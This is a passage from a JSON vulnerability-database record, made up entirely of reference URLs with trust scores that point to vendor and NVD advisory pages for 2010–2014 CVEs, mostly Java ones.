"trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5842.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5849.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5840.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-3829.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5772.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5820.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5809.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5825.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5774.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5830.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5784.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5804.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5814.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-5829.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5825" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4002" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5790" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036933" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036935" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100177048" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21664268" }, { "trust": 0.3, "url": "http://www.xerox.com/download/security/security-bulletin/b2f13-4fbfcf66f7822/cert_xrx14-004_v1-01.pdf" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04031205" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04031212" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660461" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036549" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036518" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660279" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21667389" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659530" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660500" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21664964" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv53964" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100176223" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10058" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673410" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21667825" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662705" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659217" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659219" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv52145" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21663944" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21663930" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21666093" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662535" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675992" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670264" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21661213" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659761" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659757" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662428" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662870" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21660502" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21655990" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660594" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642336" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21656459" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660039" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21664391" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21664389" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_security_vulnerabilities_for_ibm_java_on_aix?lang=en_us" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672576" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672822" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21664098\t\t" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659954 " }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659951" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas38fe73318db4e6c8786257c32007ee70b" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas3be721f674cf321ba86257c32007ee712" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672414" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671931" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21672419" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662856" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036927" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0002.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5830" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5840" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5829" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5842" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5849" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5850" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-4002.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5790.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5787" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5832.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5801.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5818.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5824.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5789.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5812.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5831.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5818" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5776.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5812" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5801" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5848.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5789" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5851.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5819.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5776" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5819" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5787.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5843.html" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2469" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2443" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1717" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1716" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0505" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1518" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2419" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3829" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5829" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5804" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1485" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5806" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5087" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2422" }, { "trust": 0.2, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5075" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2426" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5084" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1711" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2461" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5820" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2470" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0547" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2451" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2459" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5823" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2460" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1713" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5784" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5830" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5800" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2456" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5803" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5086" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2383" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2423" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2447" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2452" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2445" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2450" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5778" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5780" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5073" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1493" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2446" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5069" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-5035" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1500" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5850" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2384" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1557" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2453" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0401" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5085" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2407" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2421" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2429" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5068" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5071" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0497" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5774" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5782" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1725" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5790" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5805" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5802" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5849" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1719" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2448" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2458" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5825" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0506" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1484" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2430" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2415" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3216" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1718" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5772" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5074" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2454" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2444" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5072" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2436" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4416" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1537" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2449" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0503" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2457" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0169" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3563" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0809" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5077" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1723" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1726" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1571" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5081" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5840" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5851" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2465" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2431" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2473" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5783" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2463" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2412" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5809" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2420" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0501" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2417" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2471" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2424" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5076" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5842" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1569" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1724" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5797" }, { "trust": 0.2, "url": "http://security.gentoo.org/" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5070" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1486" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2472" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1488" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0502" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5814" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5817" }, { "trust": 0.2, "url": "https://bugs.gentoo.org." }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2455" }, { "trust": 0.2, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5089" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2013-5802" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2033-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=31270" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5372" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5457" }, { "trust": 0.1, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5375" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5372.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4041" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5375.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-4041.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5457.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5803" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5814" }, { "trust": 0.1, "url": "http://advisories.mageia.org/mgasa-2013-0323.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5823" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5802" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5797" }, { "trust": 0.1, "url": "http://blog.fuseyism.com/index.php/2013/09/07/icedtea-1-11-13-released/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5849" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5778" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5842" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5774" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5817" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5780" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5830" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5840" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3829" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5784" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5809" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5804" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5850" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5829" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5782" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4002" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5820" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5825" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5772" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5783" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5790" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0864" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0865" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4471" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3557" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3562" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4002" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1478" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4540" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0441" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0870" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3554" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0862" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0706" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0434" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3556" }, { "trust": 0.1, "url": 